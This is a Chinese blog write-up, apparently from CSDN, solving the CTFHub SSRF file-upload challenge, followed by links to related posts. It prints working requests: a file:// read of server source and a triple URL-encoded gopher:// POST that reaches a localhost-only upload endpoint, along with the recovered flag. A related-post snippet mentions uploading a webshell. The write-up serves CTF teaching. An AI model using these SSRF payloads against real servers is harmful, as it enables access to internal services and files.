php allow furl open,CTFHub-SSRF-文件上传

最新推荐文章于 2024-08-12 09:46:56 发布
最新推荐文章于 2024-08-12 09:46:56 发布
阅读量421 收藏 1
点赞数
文章标签: php allow furl open

提示

这次需要上传一个文件到flag.php了.我准备了个302.php可能会有用.祝你好运

题解

根据提示依次访问下flag.php和302.php

http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php

http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/302.php

发现flag.php处是一个文件上传界面,但是缺少提交按钮,

修改前端页面,添加提交按钮:

a9e5a64b733b

1.png

a9e5a64b733b

2.png

先看一下flag.php的源码

利用file协议读取flag.php的源码:

请求包:

GET /?url=file:///var/www/html/flag.php HTTP/1.1

Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

响应包:

HTTP/1.1 200 OK

Server: openresty/1.15.8.2

Date: Sat, 31 Oct 2020 07:10:42 GMT

Content-Type: text/html; charset=UTF-8

Content-Length: 356

Connection: close

X-Powered-By: PHP/5.6.40

Vary: Accept-Encoding

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Methods: *

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){

echo "Just View From 127.0.0.1";

return;

}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){

echo getenv("CTFHUB");

exit;

}

?>

Upload Webshell

发现会判断文件是否为空。

随便上传一个非空文件,抓包:

(haha.txt:哈哈哈哈)

POST /flag.php HTTP/1.1

Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Referer: http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php

Content-Type: multipart/form-data; boundary=---------------------------173052974622637

Content-Length: 311

Connection: close

Upgrade-Insecure-Requests: 1

-----------------------------173052974622637

Content-Disposition: form-data; name="file"; filename="haha.txt"

Content-Type: text/plain

����

-----------------------------173052974622637

Content-Disposition: form-data; name="submit"

�交�询

-----------------------------173052974622637--

将上面的包进行第一次url编码,然后把%0A改成%0D%0A:

POST%20/flag.php%20HTTP/1.1%0D%0AHost%3A%20challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20WOW64%3B%20rv%3A68.0%29%20Gecko/20100101%20Firefox/68.0%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AReferer%3A%20http%3A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080/%3Furl%3D127.0.0.1/flag.php%0D%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D---------------------------173052974622637%0D%0AContent-Length%3A%20311%0D%0AConnection%3A%20close%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0A%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22haha.txt%22%0D%0AContent-Type%3A%20text/plain%0D%0A%0D%0A%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22submit%22%0D%0A%0D%0A%C3%A6%C2%8F%C2%90%C3%A4%C2%BA%C2%A4%C3%A6%C2%9F%C2%A5%C3%A8%C2%AF%C2%A2%0D%0A-----------------------------173052974622637--

然后再进行两次url编码:

POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637--

拼接payload发送GET请求:

GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637-- HTTP/1.1

Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

得到flag:

HTTP/1.1 200 OK

Server: openresty/1.15.8.2

Date: Sat, 31 Oct 2020 07:32:30 GMT

Content-Type: text/html; charset=UTF-8

Content-Length: 241

Connection: close

X-Powered-By: PHP/5.6.40

Vary: Accept-Encoding

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Methods: *

HTTP/1.1 200 OK

Date: Sat, 31 Oct 2020 07:32:30 GMT

Server: Apache/2.4.25 (Debian)

X-Powered-By: PHP/5.6.40

Content-Length: 48

Connection: close

Content-Type: text/html; charset=UTF-8

ctfhub{562a1f1288bed76e4fb1b639c74d1cd24653d7b1}

陈怡希
关注
SSRF学习(5)gopher协议上传文件
m0_64417923的博客
05-14 686
题目:这次需要上传一个文件到flag.php了.祝你好运 首先从目标机本地访问flag.phpurl=http://127.0.0.1/flag.php 得到一个文件上传的界面,需要上传一个Webshell。再查看源代码: /?url=file:///var/www/html/flag.php <?php ​ error_reporting(0); ​ if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "...
CTFHUB-web-SSRF
ookami6497的博客
03-25 879
CTFHUB-web-ssrf
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 558
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
SSRF POST请求 上传文件 FastCGI协议 Redis协议
最新发布
qq_69100706的博客
08-12 617
SSRF(Server-Side Request Forgery,服务器侧请求伪造)攻击经常被用于探索和利用后端服务的漏洞,包括通过POST请求上传文件,以及滥用FastCGI和Redis协议等。
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2535
CTFhub ssrf 端口扫描&文件上传
CTFHUB-SSRF-上传文件
o3Ev的博客
07-12 1405
CTFHUB-SSRF-上传文件 先用file协议读下flag.php的内容: file:///var/www/html/flag.php 可知是随便上传文件就行 访问127.0.0.1/flag.php,是个上传界面 但并没有提交,所以我们得自己补一个提交按钮: <input type="submit" name="submit"> 随便抓个上传包: 进行两次url编码,得到: POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%
CTFHubssrf漏洞--之上传文件
weixin_57240513的博客
07-24 240
第一步:打开环境 第二步:访问flag.php 第三步:没有提交按钮,所以打开检查器,编辑html代码 第四步:修改代码如下图 第五步:点击提交按钮,抓包提交数据包 第六步:将host后面改为127.0.0.1:80,将数据包发送到repeater 第七步:将乱码的中文删掉重新输入两个中文字 第八步:将数据包保存为txt文件 第九步:将保存的数据包代码进行第一次编码 第十步:将第一次编码后的数据包ctrl+f替换,将%0A替换为%0A%0D再进行
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 1万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
FURL3X-crx插件
03-27
语言:Français 实时发布通知的数量为FURL3X,敬请期待! 扩展了FURL3X的实时扩展警报,可以将Aussi d'une界面图形化,并支持建议的潜水者留置权!
Python-furl一个让处理URL更简单小型Python库
08-11
Python-furl一个小型但功能强大的Python库,专为简化URL处理而设计。它提供了一种优雅的方式来解析、操作和重构URLs,对于开发者来说,它是一个极其实用的工具,尤其是在处理网络请求和数据抓取时。在本文中,我们...
利用ssrf上传文件到服务器,4.4. SSRF
weixin_34413579的博客
08-02 196
4.4.4. 过滤绕过¶4.4.4.1. 更改IP地址写法¶一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP,如采用如下正则表达式:^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\....
ctfhub技能树—文件上传(全)
Naptmn的博客
02-10 1771
无验证 直接上传一句话木马,之后蚁剑连接即可。记得要加相对地址去连接。在www文件夹下可以找到flag
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传文件包含总结篇
m0_57379855的博客
03-23 5711
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2356
ssrf
ctfhub web-SSRF(服务器请求伪造) 文件上传
SinAlone的博客
06-30 407
提示:这次需要上传一个文件到flag.php了.祝你好运 使用file://伪协议查看flag.phpphp源码 得知flag.php只接受来自127.0.0.1的访问 访问flag.php 观察到只有浏览文件没有提交文件,咱们打开f12自己给他加个提交。 然后选好要上传文件成下图 文件随便是啥,咱就用个一句话木马 此时用burp抓包拦截请求,点击提交查询 得到如下包 将其中的Host内容改为 Host:127.0.0.1:80 之后将此包内容复制粘贴,
PHP代码审计
liuzp111的专栏
11-15 389
php.ini 核心配置注意事项 设置 register_globals = Off PHP5.5版本register_globals配置被删除 register_globals的危害:会将用户提交的GET,POST参数注册成全局变量并初始化为参数对应的值 设置allow_url_include = Off ,当为On 时会出现文件远程包含漏洞,一般默认设置就好,如下: allow_...
2022年第五空间网络安全大赛WriteUp
渗透测试研究中心
09-22 6902
一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码网站源码:index.php:<?phpinclude("class.php");if(isset($_GET['img_name'])){$down=newcheck_img();#hereecho$down->img_check();}if(isset...
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8529
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1866
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
uu-mobile://open_wx_mini_program?id=gh_7baf02a2ac99&path=pages%2fwebview%2fwebview%3furl%3dhttps%3a%2f%2fmp.weixin.qq.com%2fs%2ftna2h86cctgngvxfoz_hya
05-01
uu-mobile://open_wx_mini_program?id=gh_7baf02a2ac99是一个微信小程序的链接。微信小程序是一种轻量级的应用程序,它可以在不离开微信的情况下完成特定的任务。这个链接指向的是一个名为“UU有品”的微信小程序,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值